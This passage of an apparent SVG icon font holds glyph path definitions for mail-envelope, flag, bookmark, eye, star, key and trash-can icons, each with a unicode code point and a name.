<glyph unicode="&#xe947;" glyph-name="mail-envelope-open4" d="M226.462 418.462l301.538-258.462 301.538 258.462-26.471 26.471-275.067-230.532-275.067 230.532-26.471-26.471zM928 512v-448.19c0-35.185-28.705-63.81-64.115-63.81h-671.77c-35.643 0-64.115 28.569-64.115 63.81v448.19l400 352 400-352z" />
<glyph unicode="&#xe948;" glyph-name="mail-envelope-open5" d="M538.182 256.283l-54.294-0.283h108.112l0.638 0.567-3.18-0.017 210.542 188.25v258.923c0 17.826-14.551 32.276-31.999 32.276h-480.003c-17.672 0-31.999-14.2-31.999-32.066v-262.334l209.632-184.97 72.55-0.347zM418.909 768l109.091 96 109.091-96h130.992c35.408 0 63.918-28.648 63.918-63.988v-107.532l96-84.48v-448.19c0-35.185-28.705-63.81-64.115-63.81h-671.77c-35.643 0-64.115 28.569-64.115 63.81v448.19l96 84.48v107.532c0 35.59 28.617 63.988 63.918 63.988h130.992zM589.691 768l-61.691 54.4-61.691-54.4h123.381zM832 554.327v-84.994l48 42.667-48 42.327zM224 469.333v84.994l-48-42.327 48-42.667zM432 224l-224-192h640l-224 192h-192zM885.924 40.795v0 0c6.203 5.866 10.076 14.145 10.076 23.204v416.001l-256-224.547 245.924-214.659zM170.076 40.795l245.924 214.659-256 224.547v-416.001c0-9.060 3.872-17.338 10.076-23.204v0 0z" />
<glyph unicode="&#xe949;" glyph-name="mail-envelope-open6" d="M709.925 315.936l-69.925-59.936 189.538-162.462-25.846-25.846-191.866 164.457-167.149-0.729-0.677 0.58-191.692-164.308-25.846 25.846 189.538 162.462-69.925 59.936-122.075 103.263v177.281l-96-84.48v-448.19c0-35.241 28.472-63.81 64.115-63.81h671.77c35.41 0 64.115 28.624 64.115 63.81v448.19l-96 84.48v-177.281l-122.075-103.263zM418.909 768l109.091 96 109.091-96h-218.182zM287.999 736c-17.672 0-31.999-14.2-31.999-32.066v-262.334l200.070-170.109h141.432l202.498 170.109v262.334c0 17.71-14.551 32.066-31.999 32.066h-480.003z" />
<glyph unicode="&#xe94a;" glyph-name="mail-envelope-closed3" d="M170.080 663.235l247.52-215.235-247.581-215.287c-6.206 5.878-10.019 14.235-10.019 23.507v383.562c0 9.253 3.874 17.582 10.080 23.454zM885.981 663.287c6.206-5.878 10.019-14.235 10.019-23.507v-383.562c0-9.252-3.874-17.582-10.080-23.454l-247.52 215.235 247.581 215.287zM614.459 427.181l233.541-203.181h-640l233.541 203.181 86.459-75.181 86.459 75.181zM192.115 704c-35.41 0-64.115-28.624-64.115-63.81v-384.38c0-35.241 28.472-63.81 64.115-63.81h671.77c35.41 0 64.115 28.624 64.115 63.81v384.38c0 35.241-28.472 63.81-64.115 63.81h-671.77zM528 393.6l-320 278.4h640l-320-278.4z" />
<glyph unicode="&#xe94b;" glyph-name="mail-envelope-closed4" d="M829.538 285.538l-25.846-25.846-191.692 164.308-84-72-84 72-191.692-164.308-25.846 25.846 189.538 162.462-189.538 162.462 25.846 25.846 275.692-236.308 275.692 236.308 25.846-25.846-189.538-162.462 189.538-162.462zM192.115 704c-35.41 0-64.115-28.624-64.115-63.81v-384.38c0-35.241 28.472-63.81 64.115-63.81h671.77c35.41 0 64.115 28.624 64.115 63.81v384.38c0 35.241-28.472 63.81-64.115 63.81h-671.77z" />
<glyph unicode="&#xe94c;" glyph-name="mail-envelope-open7" d="M528 864l-400-352v-448.19c0-35.241 28.472-63.81 64.115-63.81h671.77c35.41 0 64.115 28.624 64.115 63.81v448.19l-400 352zM432 224h192l224-192h-640l224 192zM528 822.4l352-310.4-288-256h-128l-288 256 352 310.4zM885.924 40.795l-245.924 214.659 256 224.547v-416.001c0-9.060-3.872-17.338-10.076-23.204v0 0zM170.076 40.795v0 0c-6.203 5.866-10.076 14.145-10.076 23.204v416.001l256-224.547-245.924-214.659z" />
<glyph unicode="&#xe94d;" glyph-name="mail-envelope-open8" d="M528 864l-400-352v-448.2c0-35.2 28.5-63.8 64.1-63.8h671.8c35.4 0 64.1 28.6 64.1 63.8v448.2l-400 352zM829.5 93.5v0l-25.8-25.8-191.7 164.3-84-72-84 72-191.7-164.3-25.8 25.8 189.5 162.5-189.5 162.5 25.8 25.8 275.7-236.3 275.7 236.3 25.8-25.8-189.5-162.5 189.5-162.5z" />
<glyph unicode="&#xe94e;" glyph-name="mail-error" d="M832 398.769v273.012c0 9.271-3.813 17.628-10.019 23.507v0l-247.581-215.287 138.456-120.397 71.144 120.397 48-81.231zM696.579 332.057l-146.12 127.125-86.459-75.181-86.459 75.181-233.541-203.181h507.636l44.942 76.057zM632.727 224h-504.612c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-327.575l128-216.615h-416l56.727 96zM106.080 695.235c-6.206-5.871-10.080-14.201-10.080-23.454v-383.562c0-9.271 3.813-17.628 10.019-23.507v0l247.581 215.287-247.52 215.235zM464 425.6l320 278.4h-640l320-278.4zM784 416l-152-256h304l-152 256zM768 352v-96h32v96h-32zM768 224v-32h32v32h-32z" />
<glyph unicode="&#xe94f;" glyph-name="mail-error2" d="M689.033 383.115l-113.033 96.885 189.538 162.462-25.846 25.846-275.692-236.308-275.692 236.308-25.846-25.846 189.538-162.462-189.538-162.462 25.846-25.846 191.692 164.308 84-72 84 72 122.219-104.759-75.108-127.241h-466.996c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-263.719l-80 135.529-94.967-160.885zM784 480l208-352h-416l208 352zM768 352v-96h32v96h-32zM768 224v-32h32v32h-32z" />
<glyph unicode="&#xe950;" glyph-name="mail-checked" d="M832 479.283v192.498c0 9.271-3.813 17.628-10.019 23.507v0l-247.581-215.287 93.321-81.148c31.285 48.805 86.005 81.148 148.279 81.148 5.393 0 10.73-0.243 16-0.717v0 0zM652.838 370.111l-102.38 89.070-86.459-75.181-86.459 75.181-233.541-203.181h502.625c-4.316 15.259-6.625 31.36-6.625 48 0 23.382 4.56 45.699 12.838 66.111v0 0zM659.191 224h-531.076c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-198.815c73.872-20.894 128-88.813 128-169.375 0-97.202-78.798-176-176-176-68.395 0-127.678 39.013-156.809 96v0zM106.080 695.235c-6.206-5.871-10.080-14.201-10.080-23.454v-383.562c0-9.271 3.813-17.628 10.019-23.507v0l247.581 215.287-247.52 215.235zM464 425.6l320 278.4h-640l320-278.4zM816 160c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0 0zM800 216.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xe951;" glyph-name="mail-checked2" d="M644.309 421.45l-68.309 58.55 189.538 162.462-25.846 25.846-275.692-236.308-275.692 236.308-25.846-25.846 189.538-162.462-189.538-162.462 25.846-25.846 191.692 164.308 84-72 84 72 78.121-66.961c-11.645-25.961-18.121-54.743-18.121-85.039 0-28.349 5.671-55.373 15.941-80h-495.826c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-165.756c-15.409 3.64-31.479 5.566-48 5.566-71.296 0-134.214-35.871-171.691-90.55v0 0zM816 128c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0zM800 216.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xe952;" glyph-name="mail-cancel" d="M816 281.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882zM832 479.283v192.498c0 9.271-3.813 17.628-10.019 23.507v0l-247.581-215.287 93.321-81.148c31.285 48.805 86.005 81.148 148.279 81.148 5.393 0 10.73-0.243 16-0.717v0 0zM652.838 370.111l-102.38 89.070-86.459-75.181-86.459 75.181-233.541-203.181h502.625c-4.316 15.259-6.625 31.36-6.625 48 0 23.382 4.56 45.699 12.838 66.111v0 0zM659.191 224h-531.076c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-198.815c73.872-20.894 128-88.813 128-169.375 0-97.202-78.798-176-176-176-68.395 0-127.678 39.013-156.809 96v0zM106.080 695.235c-6.206-5.871-10.080-14.201-10.080-23.454v-383.562c0-9.271 3.813-17.628 10.019-23.507v0l247.581 215.287-247.52 215.235zM464 425.6l320 278.4h-640l320-278.4zM816 160c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0 0z" />
<glyph unicode="&#xe953;" glyph-name="mail-cancel2" d="M816 281.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882zM644.309 421.45l-68.309 58.55 189.538 162.462-25.846 25.846-275.692-236.308-275.692 236.308-25.846-25.846 189.538-162.462-189.538-162.462 25.846-25.846 191.692 164.308 84-72 84 72 78.121-66.961c-11.645-25.961-18.121-54.743-18.121-85.039 0-28.349 5.671-55.373 15.941-80h-495.826c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-165.756c-15.409 3.64-31.479 5.566-48 5.566-71.296 0-134.214-35.871-171.691-90.55v0 0zM816 128c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xe954;" glyph-name="mail--forbidden" d="M928.51 393.883l-202.393-202.393c24.635-19.706 55.883-31.49 89.883-31.49 79.529 0 144 64.471 144 144 0 34-11.784 65.248-31.49 89.883zM905.883 416.51c-24.635 19.706-55.883 31.49-89.883 31.49-79.529 0-144-64.471-144-144 0-34 11.784-65.248 31.49-89.883l202.393 202.393zM832 479.283v192.498c0 9.271-3.813 17.628-10.019 23.507v0l-247.581-215.287 93.321-81.148c31.285 48.805 86.005 81.148 148.279 81.148 5.393 0 10.73-0.243 16-0.717v0 0zM652.838 370.111l-102.38 89.070-86.459-75.181-86.459 75.181-233.541-203.181h502.625c-4.316 15.259-6.625 31.36-6.625 48 0 23.382 4.56 45.699 12.838 66.111v0 0zM659.191 224h-531.076c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-198.815c73.872-20.894 128-88.813 128-169.375 0-97.202-78.798-176-176-176-68.395 0-127.678 39.013-156.809 96v0zM106.080 695.235c-6.206-5.871-10.080-14.201-10.080-23.454v-383.562c0-9.271 3.813-17.628 10.019-23.507v0l247.581 215.287-247.52 215.235zM464 425.6l320 278.4h-640l320-278.4z" />
<glyph unicode="&#xe955;" glyph-name="mail--forbidden2" d="M951.252 416.625c25.442-30.52 40.748-69.785 40.748-112.625 0-97.202-78.798-176-176-176-42.84 0-82.105 15.306-112.625 40.748l247.877 247.877zM928.625 439.252c-30.52 25.442-69.785 40.748-112.625 40.748-97.202 0-176-78.798-176-176 0-42.84 15.306-82.105 40.748-112.625l247.877 247.877zM644.309 421.45l-68.309 58.55 189.538 162.462-25.846 25.846-275.692-236.308-275.692 236.308-25.846-25.846 189.538-162.462-189.538-162.462 25.846-25.846 191.692 164.308 84-72 84 72 78.121-66.961c-11.645-25.961-18.121-54.743-18.121-85.039 0-28.349 5.671-55.373 15.941-80h-495.826c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-165.756c-15.409 3.64-31.479 5.566-48 5.566-71.296 0-134.214-35.871-171.691-90.55v0 0z" />
<glyph unicode="&#xe956;" glyph-name="mail-add" d="M800 320v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM832 479.283v192.498c0 9.271-3.813 17.628-10.019 23.507v0l-247.581-215.287 93.321-81.148c31.285 48.805 86.005 81.148 148.279 81.148 5.393 0 10.73-0.243 16-0.717v0 0zM652.838 370.111l-102.38 89.070-86.459-75.181-86.459 75.181-233.541-203.181h502.625c-4.316 15.259-6.625 31.36-6.625 48 0 23.382 4.56 45.699 12.838 66.111v0 0zM659.191 224h-531.076c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-198.815c73.872-20.894 128-88.813 128-169.375 0-97.202-78.798-176-176-176-68.395 0-127.678 39.013-156.809 96v0zM106.080 695.235c-6.206-5.871-10.080-14.201-10.080-23.454v-383.562c0-9.271 3.813-17.628 10.019-23.507v0l247.581 215.287-247.52 215.235zM464 425.6l320 278.4h-640l320-278.4zM816 160c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0 0z" />
<glyph unicode="&#xe957;" glyph-name="mail-add2" d="M800 288h-96v32h96v96h32v-96h96v-32h-96v-96h-32v96zM644.309 421.45l-68.309 58.55 189.538 162.462-25.846 25.846-275.692-236.308-275.692 236.308-25.846-25.846 189.538-162.462-189.538-162.462 25.846-25.846 191.692 164.308 84-72 84 72 78.121-66.961c-11.645-25.961-18.121-54.743-18.121-85.039 0-28.349 5.671-55.373 15.941-80h-495.826c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-165.756c-15.409 3.64-31.479 5.566-48 5.566-71.296 0-134.214-35.871-171.691-90.55v0 0zM816 128c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xe958;" glyph-name="mail-remove" d="M832 479.283v192.498c0 9.271-3.813 17.628-10.019 23.507v0l-247.581-215.287 93.321-81.148c31.285 48.805 86.005 81.148 148.279 81.148 5.393 0 10.73-0.243 16-0.717v0 0zM652.838 370.111l-102.38 89.070-86.459-75.181-86.459 75.181-233.541-203.181h502.625c-4.316 15.259-6.625 31.36-6.625 48 0 23.382 4.56 45.699 12.838 66.111v0 0zM659.191 224h-531.076c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-198.815c73.872-20.894 128-88.813 128-169.375 0-97.202-78.798-176-176-176-68.395 0-127.678 39.013-156.809 96v0zM106.080 695.235c-6.206-5.871-10.080-14.201-10.080-23.454v-383.562c0-9.271 3.813-17.628 10.019-23.507v0l247.581 215.287-247.52 215.235zM464 425.6l320 278.4h-640l320-278.4zM816 160c79.529 0 144 64.471 144 144s-64.471 144-144 144c-79.529 0-144-64.471-144-144s64.471-144 144-144v0 0zM704 320v-32h224v32h-224z" />
<glyph unicode="&#xe959;" glyph-name="mail-remove2" d="M644.309 421.45l-68.309 58.55 189.538 162.462-25.846 25.846-275.692-236.308-275.692 236.308-25.846-25.846 189.538-162.462-189.538-162.462 25.846-25.846 191.692 164.308 84-72 84 72 78.121-66.961c-11.645-25.961-18.121-54.743-18.121-85.039 0-28.349 5.671-55.373 15.941-80h-495.826c-35.643 0-64.115 28.569-64.115 63.81v384.38c0 35.185 28.705 63.81 64.115 63.81h671.77c35.643 0 64.115-28.569 64.115-63.81v-165.756c-15.409 3.64-31.479 5.566-48 5.566-71.296 0-134.214-35.871-171.691-90.55v0 0zM816 128v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM704 320v-32h224v32h-224z" />
<glyph unicode="&#xe95a;" glyph-name="flag3" d="M256 624v208c0 0 95.24 71.562 256 0s256 0 256 0v-352c0 0-95.275-69.996-256 0-105.964 46.148-183.48 31.446-224 16.071v-464.071h-32v592zM496.66 803.199c-131.145 57.668-208.66 9.602-208.66 9.602v-282.805c0 0 100.94 40.532 236.057-20.633 126.559-57.291 212.506-10.891 212.506-10.891v285.527c0 0-96.734-43.756-239.902 19.199v0 0z" />
<glyph unicode="&#xe95b;" glyph-name="flag4" d="M256 624.194v-592h32v464.071c40.52 15.375 118.036 30.077 224-16.071 160.725-69.996 256 0 256 0v352c0 0-95.24-71.563-256 0s-256 0-256 0v-208z" />
<glyph unicode="&#xe95c;" glyph-name="flag5" d="M256 688v176h512l-176-176 176-176h-480v-480h-32v656zM288 832v-288h400l-144 144 144 144h-400z" />
<glyph unicode="&#xe95d;" glyph-name="flag6" d="M256 688v-656h32v480h480l-176 176 176 176h-512v-176z" />
<glyph unicode="&#xe95e;" glyph-name="flag7" d="M288 656v208l448-192-416-178.286v-461.714h-32v624zM320 816v-288l336 144-336 144z" />
<glyph unicode="&#xe95f;" glyph-name="flag8" d="M288 656v-624h32v461.714l416 178.286-448 192v-208z" />
<glyph unicode="&#xe960;" glyph-name="flag9" d="M224 688v176h512v-352h-480v-480h-32v656zM256 832v-288h448v288h-448z" />
<glyph unicode="&#xe961;" glyph-name="flag10" d="M224 688v-656h32v480h480v352h-512v-176z" />
<glyph unicode="&#xe962;" glyph-name="bookmark2" d="M415.909 832h192.182c52.977 0 95.909-42.853 95.909-95.715v-672.285l-192 192-192-192v672.285c0 52.778 42.94 95.715 95.909 95.715zM415.988 800c-35.339 0-63.988-28.749-63.988-63.806v-595.393l160 160 160-160v595.393c0 35.239-28.398 63.806-63.988 63.806h-192.025z" />
<glyph unicode="&#xe963;" glyph-name="bookmark3" d="M415.909 832c-52.969 0-95.909-42.937-95.909-95.715v-672.285l192 192 192-192v672.285c0 52.862-42.932 95.715-95.909 95.715h-192.182z" />
<glyph unicode="&#xe964;" glyph-name="bookmark-add" d="M608 544v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM640 352.717v0 0c89.704 8.084 160 83.474 160 175.283s-70.296 167.199-160 175.283v33.003c0 52.862-42.932 95.715-95.909 95.715h-192.182c-52.969 0-95.909-42.937-95.909-95.715v-672.285l192 192 192-192v288.717zM608 352.717v-211.917l-160 160-160-160v595.393c0 35.057 28.648 63.806 63.988 63.806h192.025c35.59 0 63.988-28.567 63.988-63.806v-32.912c-89.704-8.084-160-83.474-160-175.283s70.296-167.199 160-175.283v0 0zM624 384v0 0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144z" />
<glyph unicode="&#xe965;" glyph-name="bookmark-add2" d="M608 544v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM640 320.606v-256.606l-192 192-192-192v672.285c0 52.778 42.94 95.715 95.909 95.715h192.182c52.977 0 95.909-42.853 95.909-95.715v-0.891c-5.281 0.402-10.616 0.606-16 0.606-114.875 0-208-93.125-208-208s93.125-208 208-208c5.384 0 10.719 0.205 16 0.606v0 0zM624 352c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xe966;" glyph-name="bookmark-remove" d="M640 352.717v0 0c89.704 8.084 160 83.474 160 175.283s-70.296 167.199-160 175.283v33.003c0 52.862-42.932 95.715-95.909 95.715h-192.182c-52.969 0-95.909-42.937-95.909-95.715v-672.285l192 192 192-192v288.717zM608 352.717v-211.917l-160 160-160-160v595.393c0 35.057 28.648 63.806 63.988 63.806h192.025c35.59 0 63.988-28.567 63.988-63.806v-32.912c-89.704-8.084-160-83.474-160-175.283s70.296-167.199 160-175.283v0 0zM624 384v0 0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144zM512 544v-32h224v32h-224z" />
<glyph unicode="&#xe967;" glyph-name="bookmark-remove2" d="M640 320.606v-256.606l-192 192-192-192v672.285c0 52.778 42.94 95.715 95.909 95.715h192.182c52.977 0 95.909-42.853 95.909-95.715v-0.891c-5.281 0.402-10.616 0.606-16 0.606-114.875 0-208-93.125-208-208s93.125-208 208-208c5.384 0 10.719 0.205 16 0.606v0 0zM624 352v0c-97.202 0-176 78.798-176 176s78.798 176 176 176c97.202 0 176-78.798 176-176s-78.798-176-176-176zM512 544v-32h224v32h-224z" />
<glyph unicode="&#xe968;" glyph-name="eye-hidden" d="M259.478 291.478c-111.728 65.958-163.478 156.522-163.478 156.522s128 224 416 224c41.744 0 80.127-4.706 115.246-12.754l-27.185-27.185c-27.352 5.057-56.698 7.939-88.061 7.939-256 0-377.602-192-377.602-192s48.473-76.535 148.639-132.962l-23.559-23.559zM396.754 236.754c35.119-8.048 73.502-12.754 115.246-12.754 288 0 416 224 416 224s-51.751 90.564-163.478 156.522l-23.559-23.559c100.166-56.427 148.639-132.962 148.639-132.962s-121.602-192-377.602-192c-31.363 0-60.709 2.882-88.061 7.939l-27.185-27.185zM636.757 476.757c2.122-9.244 3.243-18.869 3.243-28.757 0-70.692-57.308-128-128-128-9.888 0-19.513 1.121-28.757 3.243l28.757 28.757c24.569 0 49.137 9.373 67.882 28.118s28.118 43.314 28.118 67.882l28.757 28.757zM540.757 572.757c-9.244 2.122-18.869 3.243-28.757 3.243-70.692 0-128-57.308-128-128 0-9.888 1.121-19.513 3.243-28.757l28.757 28.757c0 24.569 9.373 49.137 28.118 67.882s43.314 28.118 67.882 28.118l28.757 28.757zM768 736l-544-544 32-32 544 544-32 32z" />
<glyph unicode="&#xe969;" glyph-name="eye-hidden2" d="M259.478 291.478c-111.728 65.958-163.478 156.522-163.478 156.522s128 224 416 224c41.744 0 80.127-4.706 115.246-12.754l-86.489-86.489c-9.244 2.122-18.869 3.243-28.757 3.243-70.692 0-128-57.308-128-128 0-9.888 1.121-19.513 3.243-28.757l-127.765-127.765zM396.754 236.754c35.119-8.048 73.502-12.754 115.246-12.754 288 0 416 224 416 224s-51.751 90.564-163.478 156.522l-127.765-127.765c2.122-9.244 3.243-18.869 3.243-28.757 0-70.692-57.308-128-128-128-9.888 0-19.513 1.121-28.757 3.243l-86.489-86.489zM608 448c0-24.569-9.373-49.137-28.118-67.882s-43.314-28.118-67.882-28.118l96 96zM512 544c-24.569 0-49.137-9.373-67.882-28.118s-28.118-43.314-28.118-67.882l96 96zM768 736l-544-544 32-32 544 544-32 32z" />
<glyph unicode="&#xe96a;" glyph-name="eye3" d="M512 672v0 0c288 0 416-224 416-224s-128-224-416-224c-288 0-416 224-416 224s128 224 416 224zM512 640c-256 0-377.602-192-377.602-192s121.602-192 377.602-192c256 0 377.602 192 377.602 192s-121.602 192-377.602 192v0 0zM512 320v0 0c-70.692 0-128 57.308-128 128s57.308 128 128 128c70.692 0 128-57.308 128-128s-57.308-128-128-128zM512 352c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96v0 0zM512 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0 0z" />
<glyph unicode="&#xe96b;" glyph-name="eye4" d="M512 672v0c288 0 416-224 416-224s-128-224-416-224c-288 0-416 224-416 224s128 224 416 224zM512 320c70.692 0 128 57.308 128 128s-57.308 128-128 128c-70.692 0-128-57.308-128-128s57.308-128 128-128v0zM512 352v0c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM512 416c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xe96c;" glyph-name="star2" d="M512 224l288-192-128 320 288 192h-320l-128 320-128-320h-320l288-192-128-320 288 192zM512 263.902l-217.6-145.502 102.4 246.399-230.4 147.2h239.998l105.602 272 105.602-272h240l-230.402-147.2 102.402-246.399-217.602 145.502z" />
<glyph unicode="&#xe96d;" glyph-name="star3" d="M512 224l-288-192 128 320-288 192h320l128 320 128-320h320l-288-192 128-320z" />
<glyph unicode="&#xe96e;" glyph-name="key5" d="M593.037 337.037l-145.037-145.037h-96v-96h-96v-96h-160v160l337.037 337.037c-11.016 29.564-17.037 61.56-17.037 94.963 0 150.221 121.779 272 272 272s272-121.779 272-272c0-150.221-121.779-272-272-272-33.403 0-65.399 6.021-94.963 17.037v0 0zM447.96 463.96l-319.96-319.96v-112h96v96h96v96h112l127.96 127.96c-47.513 25.397-86.603 64.487-112 112v0 0zM928 592c0 132.548-107.452 240-240 240s-240-107.452-240-240c0-132.548 107.452-240 240-240s240 107.452 240 240v0 0zM864 672v0 0c0-53.019-42.981-96-96-96s-96 42.981-96 96c0 53.019 42.981 96 96 96s96-42.981 96-96zM832 672c0 35.346-28.654 64-64 64s-64-28.654-64-64c0-35.346 28.654-64 64-64s64 28.654 64 64v0 0z" />
<glyph unicode="&#xe96f;" glyph-name="key6" d="M593.037 337.037l-145.037-145.037h-96v-96h-96v-96h-160v160l337.037 337.037c-11.016 29.564-17.037 61.56-17.037 94.963 0 150.221 121.779 272 272 272s272-121.779 272-272c0-150.221-121.779-272-272-272-33.403 0-65.399 6.021-94.963 17.037v0 0zM864 672c0 53.019-42.981 96-96 96s-96-42.981-96-96c0-53.019 42.981-96 96-96s96 42.981 96 96v0z" />
<glyph unicode="&#xe970;" glyph-name="key7" d="M545.077 532.228l-406.918-407.548c-13.74-13.761-13.734-36.138-0.067-49.901l0.588-0.593c13.703-13.799 35.8-14.002 49.705-0.104l84.787 84.745 78.827-78.827 48 48-78.815 78.815 96.024 95.976 62.791-62.791 48 48-62.779 62.779 130.624 130.559c30.801-21.036 68.041-33.338 108.154-33.338 106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192 0-39.948 12.2-77.046 33.077-107.772zM416 256l-48-48 80-80-96-96-80 80-60.015-60.015c-26.923-26.923-70.528-27.044-97.348-0.223l1.125-1.125c-26.779 26.779-26.72 70.405 0.223 97.348l389.037 389.037c-15.989 30.831-25.022 65.85-25.022 102.978 0 123.712 100.288 224 224 224s224-100.288 224-224c0-123.712-100.288-224-224-224-37.129 0-72.147 9.033-102.978 25.022v0l-89.022-89.022 64-64-96-96-64 64zM704 512v0 0c-70.692 0-128 57.308-128 128s57.308 128 128 128c70.692 0 128-57.308 128-128s-57.308-128-128-128zM704 544c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96v0 0z" />
<glyph unicode="&#xe971;" glyph-name="key8" d="M416.273 256l-48-48 80-80-96-96-80 80-60.015-60.015c-26.923-26.923-70.528-27.044-97.348-0.223l1.125-1.125c-26.779 26.779-26.72 70.405 0.223 97.348l389.037 389.037c-15.989 30.831-25.022 65.85-25.022 102.978 0 123.712 100.288 224 224 224s224-100.288 224-224c0-123.712-100.288-224-224-224-37.129 0-72.147 9.033-102.978 25.022v0l-89.022-89.022 64-64-96-96-64 64zM704.273 512c70.692 0 128 57.308 128 128s-57.308 128-128 128c-70.692 0-128-57.308-128-128s57.308-128 128-128v0z" />
<glyph unicode="&#xe972;" glyph-name="trash-can" d="M672 768h128v-32h-544v32h128v32c0 35.593 28.616 64 63.917 64h160.167c35.249 0 63.917-28.654 63.917-64v-32zM256 704h544v-607.956c0-53.066-42.982-96.044-96.004-96.044h-351.992c-53.317 0-96.004 43.001-96.004 96.044v607.956zM288 672v-576.295c0-35.184 28.589-63.705 63.74-63.705h352.519c35.203 0 63.74 28.743 63.74 63.705v576.295h-480zM384 608v-512h32v512h-32zM512 608v-512h32v512h-32zM640 608v-512h32v512h-32zM448.094 832c-17.725 0-32.094-14.204-32.094-32v-32h224v32c0 17.673-14.012 32-32.094 32h-159.813z" />
<glyph unicode="&#xe973;" glyph-name="trash-can2" d="M672 768h128v-32h-544v32h128v32c0 35.593 28.616 64 63.917 64h160.167c35.249 0 63.917-28.654 63.917-64v-32zM256 704h544v-607.956c0-53.066-42.982-96.044-96.004-96.044h-351.992c-53.317 0-96.004 43.001-96.004 96.044v607.956zM384 608v-512h32v512h-32zM512 608v-512h32v512h-32zM640 608v-512h32v512h-32zM448.094 832c-17.725 0-32.094-14.204-32.094-32v-32h224v32c0 17.673-14.012 32-32.094 32h-159.813z" />
<glyph unicode="&#xe974;" glyph-name="trash-can3" d="M736 736h128v-32h-64v-607.781c0-53.467-42.982-96.219-96.004-96.219h-351.992c-53.317 0-96.004 43.079-96.004 96.219v607.781h-64v32h192v63.844c0 35.551 28.616 64.156 63.917 64.156h160.167c35.249 0 63.917-28.724 63.917-64.156v-63.844h64zM288 704v-608.174c0-35.25 28.589-63.826 63.74-63.826h352.519c35.203 0 63.74 28.875 63.74 63.826v608.174h-480zM384 640v-544h32v544h-32zM512 640v-544h32v544h-32zM640 640v-544h32v544h-32zM448.094 832c-17.725 0-32.094-14.165-32.094-31.967v-64.033h224v64.033c0 17.655-14.012 31.967-32.094 31.967h-159.813z" />
<glyph unicode="&#xe975;" glyph-name="trash-can4" d="M736 736h128v-32h-64v-607.781c0-53.467-42.982-96.219-96.004-96.219h-351.992c-53.317 0-96.004 43.079-96.004 96.219v607.781h-64v32h192v63.844c0 35.551 28.616 64.156 63.917 64.156h160.167c35.249 0 63.917-28.724 63.917-64.156v-63.844h64zM384 640v-544h32v544h-32zM512 640v-544h32v544h-32zM640 640v-544h32v544h-32zM448.094 832c-17.725 0-32.094-14.165-32.094-31.967v-64.033h224v64.033c0 17.655-14.012 31.967-32.094 31.967h-159.813z" />
